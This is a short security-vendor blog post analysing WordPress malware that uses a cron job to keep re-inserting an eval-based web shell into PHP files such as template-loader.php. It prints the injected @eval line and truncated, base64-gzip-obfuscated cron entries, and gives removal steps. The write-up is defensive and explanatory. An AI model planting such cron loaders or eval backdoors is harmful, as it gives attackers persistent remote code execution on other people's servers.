Our research team discovered a new type of tricky malware that modify cron to re-infect a WordPress site. It causes some problems because of unusual way of infection.

Cron is a task scheduler in Unix-based systems that allows specific commands to be executed at set intervals. More details are here https://en.wikipedia.org/wiki/Cron

How does it work?

1. Malware modifies *.php files by adding line like this,


Here is a live example of infection,

PHP file is infected via system cron.

If this line is removed from the file, the malicious entry @eval($SERVER[‘HTTP{Numbers}’]) will be restored after some time. This type of malicious code is recorded in cron and carries out the functionality of a web shell, existing in binary form.

2. The main functionality of the malicious code is performed in cron, so it is necessary to check the existing entries in it.

/16 * * * * /usr/local/bin/php -r 'eval(gzinflate(base64_decode("jVJrb6JAFP3ur2ATEzRtNqCtptk0u9VKawVpUQHdbAwMQxkZBgqDAk3/+w747CPZnQ/MHeaec8+ce2uRF/
# /1 * * * * /usr/local/bin/php -r 'eval(gzinflate(base64_decode("jVJrb6JAFP3ur2ATEzRtNqCtptk0u9VKawVpUQHdbAwMQxkZBgqDAk3/+w747CPZnQ/MHeaec8+ce2uRF/

The malicious script works as follows.

  • The cron entry starts with /16 * * * * /usr/local/bin/php, indicating that the file is overwritten every 16 minutes.
  • The malicious code points to the template-loader.php file, which is part of WordPress. This file loads theme templates, and the malicious code is directly written into it.
  • The regular expression in the entry searches for calls to the eval function using the variable $_SERVER['HTTP_0C4722A']. An attacker can send an HTTP header (HTTP_0C4722A) containing shell code, which is then executed on the server using eval. This could compromise your website and allow remote code execution on the server.

How to remove the malware?

1. If you discover an entry, as in the example above. It should be deleted, either through the console (ssh terminal + any shell) or by using any scripts to remove cron entries.

2. Malicious code from cron can be written to any file in WordPress! Recheck your WordPress setup by our Security plugin. This is a great tool to be sure that your site is safe and malware free.

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Cron as the way to re-infect WordPress

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